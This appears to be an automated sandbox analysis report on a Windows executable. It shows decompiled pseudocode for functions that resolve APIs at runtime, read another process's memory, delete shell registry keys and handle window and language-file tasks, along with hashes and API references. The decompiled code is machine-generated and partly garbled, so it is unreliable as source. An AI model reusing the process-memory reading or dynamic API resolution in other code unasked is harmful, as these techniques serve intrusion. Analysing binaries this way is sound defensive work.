                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                0x00409c73
                                                                                                                0x00409c7c
                                                                                                                0x00409c90
                                                                                                                0x00409c9f
                                                                                                                0x00409ca2
                                                                                                                0x00409ca7
                                                                                                                0x00409ca9
                                                                                                                0x00409cb1
                                                                                                                0x00409cc0
                                                                                                                0x00409cc2
                                                                                                                0x00409cc7
                                                                                                                0x00409ccf
                                                                                                                0x00409cd0
                                                                                                                0x00409cd7
                                                                                                                0x00409cd8
                                                                                                                0x00409cd9
                                                                                                                0x00409cda
                                                                                                                0x00409cdc
                                                                                                                0x00409ce0
                                                                                                                0x00409ce1
                                                                                                                0x00409ce9
                                                                                                                0x00409cf1
                                                                                                                0x00409cfb
                                                                                                                0x00409d08
                                                                                                                0x00409d08
                                                                                                                0x00000000
                                                                                                                0x00409d0d
                                                                                                                0x00409d0f

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                0x00401ac9
                                                                                                                0x00401ad1
                                                                                                                0x00401ae1
                                                                                                                0x00401ae7
                                                                                                                0x00401ae9
                                                                                                                0x00401aec
                                                                                                                0x00401c1b
                                                                                                                0x00401af2
                                                                                                                0x00401af2
                                                                                                                0x00401af8
                                                                                                                0x00401b0c
                                                                                                                0x00401b1a
                                                                                                                0x00401bfd
                                                                                                                0x00401b20
                                                                                                                0x00401b26
                                                                                                                0x00401b2b
                                                                                                                0x00401b36
                                                                                                                0x00401b40
                                                                                                                0x00401b43
                                                                                                                0x00401b4a
                                                                                                                0x00401b54
                                                                                                                0x00401b55
                                                                                                                0x00401b56
                                                                                                                0x00401b57
                                                                                                                0x00401b58
                                                                                                                0x00401b63
                                                                                                                0x00401b68
                                                                                                                0x00401b69
                                                                                                                0x00401b77
                                                                                                                0x00401b7d
                                                                                                                0x00401b82
                                                                                                                0x00401b82
                                                                                                                0x00401b88
                                                                                                                0x00401b8b
                                                                                                                0x00401b8e
                                                                                                                0x00401b91
                                                                                                                0x00401b98
                                                                                                                0x00401b9b
                                                                                                                0x00401ba0
                                                                                                                0x00401ba5
                                                                                                                0x00401baa
                                                                                                                0x00401bac
                                                                                                                0x00401bac
                                                                                                                0x00401bb2
                                                                                                                0x00401bb2
                                                                                                                0x00401bbe
                                                                                                                0x00401bc4
                                                                                                                0x00401bc6
                                                                                                                0x00401bc8
                                                                                                                0x00401bc8
                                                                                                                0x00401bd7
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                0x004045c2
                                                                                                                0x004045d1
                                                                                                                0x004045da
                                                                                                                0x004045ef
                                                                                                                0x004045f6
                                                                                                                0x00404604
                                                                                                                0x0040460b
                                                                                                                0x00404610
                                                                                                                0x00404616
                                                                                                                0x00404617
                                                                                                                0x00404618
                                                                                                                0x00404628
                                                                                                                0x00404629
                                                                                                                0x0040462a
                                                                                                                0x0040462f
                                                                                                                0x00404630
                                                                                                                0x00404631
                                                                                                                0x0040463c
                                                                                                                0x0040463d
                                                                                                                0x0040463e
                                                                                                                0x00404656
                                                                                                                0x00404662
                                                                                                                0x0040466b
                                                                                                                0x0040466d
                                                                                                                0x0040466e
                                                                                                                0x00404674
                                                                                                                0x00404679

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                0x0040314a
                                                                                                                0x00403151
                                                                                                                0x00403158
                                                                                                                0x0040315a
                                                                                                                0x00403162
                                                                                                                0x00403166
                                                                                                                0x00403190
                                                                                                                0x00403190
                                                                                                                0x00403198
                                                                                                                0x00403199
                                                                                                                0x0040319e
                                                                                                                0x004031bb
                                                                                                                0x004031a0
                                                                                                                0x004031ad
                                                                                                                0x004031b6
                                                                                                                0x004031b6
                                                                                                                0x0040319e
                                                                                                                0x0040316e
                                                                                                                0x00403176
                                                                                                                0x0040317c
                                                                                                                0x0040317f
                                                                                                                0x0040317f
                                                                                                                0x00403182
                                                                                                                0x0040318a
                                                                                                                0x00000000
                                                                                                                0x0040318c
                                                                                                                0x0040318c
                                                                                                                0x00000000
                                                                                                                0x0040318c

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                0x00404da9
                                                                                                                0x00404dbc
                                                                                                                0x00404dbf
                                                                                                                0x00404dc6
                                                                                                                0x00404dcc
                                                                                                                0x00404dce
                                                                                                                0x00404de1
                                                                                                                0x00404deb
                                                                                                                0x00404df2
                                                                                                                0x00404df4
                                                                                                                0x00404df4
                                                                                                                0x00404e07
                                                                                                                0x00404e0d
                                                                                                                0x00404e18
                                                                                                                0x00404e1c
                                                                                                                0x00404e1e
                                                                                                                0x00404e27
                                                                                                                0x00404e28
                                                                                                                0x00404e29
                                                                                                                0x00404e2f
                                                                                                                0x00404e31
                                                                                                                0x00404e37
                                                                                                                0x00404e41
                                                                                                                0x00404e42
                                                                                                                0x00404e43
                                                                                                                0x00404e46
                                                                                                                0x00404e46
                                                                                                                0x00404e1c
                                                                                                                0x00404e4d
                                                                                                                0x00404e50
                                                                                                                0x00404e5f
                                                                                                                0x00404e66
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e6d
                                                                                                                0x00404e70
                                                                                                                0x00404e85
                                                                                                                0x00404e85
                                                                                                                0x00000000
                                                                                                                0x00404e72
                                                                                                                0x00404e7b
                                                                                                                0x00404e80
                                                                                                                0x00404e83
                                                                                                                0x00404e87
                                                                                                                0x00404e89
                                                                                                                0x00404e8b
                                                                                                                0x00404e8b
                                                                                                                0x00404ea8
                                                                                                                0x00404ea8
                                                                                                                0x00000000
                                                                                                                0x00404e83

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                0x0040639c
                                                                                                                0x004063a4
                                                                                                                0x004063b2
                                                                                                                0x004063c2
                                                                                                                0x004063d3
                                                                                                                0x004063dc
                                                                                                                0x004063eb
                                                                                                                0x004063f0
                                                                                                                0x00406401
                                                                                                                0x00000000
                                                                                                                0x0040641e
                                                                                                                0x0040641f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                0x0040adf6
                                                                                                                0x0040adf8
                                                                                                                0x0040adfa
                                                                                                                0x0040adfb
                                                                                                                0x0040adfb
                                                                                                                0x0040ae02
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040ae04
                                                                                                                0x0040ae05
                                                                                                                0x0040ae6d
                                                                                                                0x0040ae6e
                                                                                                                0x0040ae73
                                                                                                                0x0040ae76
                                                                                                                0x0040ae7f
                                                                                                                0x0040ae83
                                                                                                                0x0040ae86
                                                                                                                0x00000000
                                                                                                                0x0040ae86
                                                                                                                0x0040ae8f
                                                                                                                0x0040ae0c
                                                                                                                0x0040ae10
                                                                                                                0x0040ae1e
                                                                                                                0x0040ae3b
                                                                                                                0x0040ae4a
                                                                                                                0x0040ae65
                                                                                                                0x0040ae7a
                                                                                                                0x0040ae7e
                                                                                                                0x0040ae67
                                                                                                                0x0040ae67
                                                                                                                0x0040ae68
                                                                                                                0x00000000
                                                                                                                0x0040ae68
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4e
                                                                                                                0x00000000
                                                                                                                0x0040ae4e
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3f
                                                                                                                0x0040ae53
                                                                                                                0x0040ae54
                                                                                                                0x0040ae59
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae20
                                                                                                                0x0040ae28
                                                                                                                0x0040ae2d
                                                                                                                0x0040ae30
                                                                                                                0x0040ae30
                                                                                                                0x0040ae12
                                                                                                                0x0040ae12
                                                                                                                0x0040ae13
